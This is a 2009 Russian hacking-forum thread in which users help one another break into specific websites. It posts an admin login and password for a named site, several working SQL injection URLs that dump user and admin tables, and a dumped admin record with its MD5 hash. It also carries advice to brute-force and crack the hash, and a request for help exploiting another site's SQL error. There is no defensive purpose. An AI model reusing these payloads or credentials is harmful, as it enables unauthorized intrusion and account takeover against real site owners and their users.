04.04.2009, 19:32
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
Здрасте
На сайте достал логин и пароль админа.Но не могу найти как зайти под админам . глянте пожалуиста
so-znanie.com
Login: Admin
pw: soznanie
|
|
|
04.04.2009, 19:39
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Неверный у тебя пароль... Вот и все. Кста, там инъекция есть...
http://so-znanie.com/index.php?id=-1+union+select+1,2,concat_ws(0x3a,username,user_pa ssword)+from+phpbb_users++limit+1,1
брути!
|
|
|
|
04.04.2009, 20:57
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Эм...
Сообщение от mailbrush
Неверный у тебя пароль... Вот и все. Кста, там инъекция есть...
http://so-znanie.com/index.php?id=-1+union+select+1,2,concat_ws(0x3a,username,user_pa ssword)+from+phpbb_users++limit+1,1
брути!
Челу вроде как сайт нужен, а не форум... 
Код:
http://www.so-znanie.com/index.php?id=-8+union+select+1,2,concat_ws(0x3a,id,login,password)+from+admins--+
Код:
1:admin:5870dc3ee770e65bb1a4a267f7c4fc6e
И в расшифрованом виде:
Так что правильный у него пасс...
Последний раз редактировалось -m0rgan-; 04.04.2009 в 21:02..
|
|
|
|
04.04.2009, 21:02
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
Код:
1:admin:5870dc3ee770e65bb1a4a267f7c4fc6e
И в расшифрованом виде:
Если честно , я спрашивал как заити под админам
Последний раз редактировалось Saiga; 04.04.2009 в 21:06..
|
|
|
|
04.04.2009, 19:42
|
|
Новичок
Регистрация: 01.04.2009
Сообщений: 21
С нами:
9005955
Репутация:
0
|
|
кароче нашел уязвимосьть на сайте такого содержания
Attempt to insert NULL value into column 'url_id', table 'Info_new.dbo.usrefww'; column does not allow nulls. Update fails.
ссылка примерно такая: index.php?url=199000&ref=1
Как её использовать ?
|
|
|
|
04.04.2009, 19:44
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от dllerk
кароче нашел уязвимосьть на сайте такого содержания
Attempt to insert NULL value into column 'url_id', table 'Info_new.dbo.usrefww'; column does not allow nulls. Update fails.
ссылка примерно такая: index.php?url=199000&ref=1
Как её использовать ?
Ну и в чем трабла то?
|
|
|
|
04.04.2009, 19:46
|
|
Новичок
Регистрация: 01.04.2009
Сообщений: 21
С нами:
9005955
Репутация:
0
|
|
в этом вроде должно что то быть .. я незнаю , поэтому и спрашиваю
|
|
|
|
04.04.2009, 19:54
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами:
9204308
Репутация:
256
|
|
Сообщение от dllerk
в этом вроде должно что то быть .. я незнаю , поэтому и спрашиваю
Дай полностью параметр подумаем...
|
|
|
|
04.04.2009, 20:05
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
Закодирован пароль , чем можно раскодировать ? Попробовал черес hashcracking.info , ничего не получилос .
ht_tp://www.so-znanie.com/index.php?id=-8+union+select+1,2,concat_ws(0x3a3a,username,user_ password+)+from+phpbb_users+LIMIT+1,1+--
|
|
|
|
04.04.2009, 20:13
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами:
9196401
Репутация:
930
|
|
Сообщение от Saiga
Закодирован пароль , чем можно раскодировать ? Попробовал черес hashcracking.info , ничего не получилос .
ht_tp://www.so-znanie.com/index.php?id=-8+union+select+1,2,concat_ws(0x3a3a,username,user_ password+)+from+phpbb_users+LIMIT+1,1+--
это MD5(phpBB3)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
